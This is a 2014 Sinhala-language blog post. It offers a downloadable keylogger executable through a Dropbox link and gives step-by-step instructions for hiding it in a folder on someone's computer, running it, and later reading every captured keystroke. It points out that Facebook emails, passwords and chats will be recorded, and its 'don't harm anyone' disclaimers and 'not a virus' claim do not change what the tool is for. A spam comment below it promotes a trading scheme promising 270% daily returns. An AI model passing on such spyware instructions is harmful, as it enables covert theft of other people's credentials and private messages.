Wednesday, August 13, 2014

Keyboard එකේ type කරන හැම අකුරක්ම Notepad ලෙස හොරෙන් ගමු (KEYLOGGER)

හායි යාළුවනේ,

මට හිතුනා මගෙ ලඟ තියන ගැජමැටික් කෑලි ටිකත් sitemoneylot 1 යාළුවොත් එක්ක බෙදා ගන්න.. වෙලාව ලැබෙන විධියට පුලුවන් තරම් ඉක්මනට කෙටියෙන් විස්තරේ දාන්නම් හොඳේ.

කරුණු කිහිපයක් කියන්න ඕන ඔක්කොමට කලින්.

- කාවවත් අමාරුවෙ දාන්න මේක use කරන්න එපා හොඳේ.
- මේක කිලෝ බයිට් 262 ක පොඩි Software එකක්. එච්චර පොඩි උනත් කිසිම වයිරස් එකක් නෙවෙයි. මම මේක අවුරුදු ගානක් ඉඳන් use කරන එකක්.

1. මේක KEYLOGGER Software එකක්. මෙතනින් Software එක බාගන්න

https://www.dropbox.com/s/5v7gyp53djk0wyc/KeyLogger-Shamaths%20DropBox.exe

2. ටයිප් කරන ඒවා උස්සන්න ඕන Computer එකේ කොහෙ හරි අස්සක New Folder එකක් හදලා මේක එතනට කොපි කරන්න.

3. දැන් අවශ්‍ය වෙලාවට file එක double click කරන්න. double click කරපු වෙලාවෙ ඉඳන් Keyboard එකෙන් ටයිප් කරන හැම අකුරක්ම copy වෙනවා Notepad එකකට.

4. Type කරපුවා බලාගන්න ඕන වෙලාවට File එක Save කරපු Folder එකට යන්න. ඒ file එක ලඟම Notepad file එකක් ඇති. ඒකේ ඇති ඔක්කොම අකුරු ටික. :)

5. KEYLOGGER Run වෙන එක නවත්තන්න ඕනනම්, WINDOWS TASK MANAGER (Ctrl + Alt + Delete) එකේ “Processes” tab එකට ගිහින් Keylogger select කරල End Process කරන්න. Process එක End නොකලත් Computer එක Off කරලා ආයි On කරන කොට Keylogger auto Off වෙනවා.

6. ඔන්න ඕකයි කතන්දරේ…

( මෙක run කරන computer එකෙන් facebook ගියොත්, log වෙද්දි type කරන email , password සහ chat කරන ඔක්කොම නොට් පෑඩ් එකේ පෙන්වනවා. හැබැයි කාටවත් හානි වෙන විදියෙ වැඩ කරන්න එපා හොඳේ... )

2 comments:

Blogger said...

Using Kaspersky security for a number of years, and I recommend this product to everyone.

Blogger said...

Quantum Binary Signals

Professional trading signals sent to your mobile phone every day.

Start following our trades NOW & earn up to 270% per day.

Post a Comment

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | coupon codes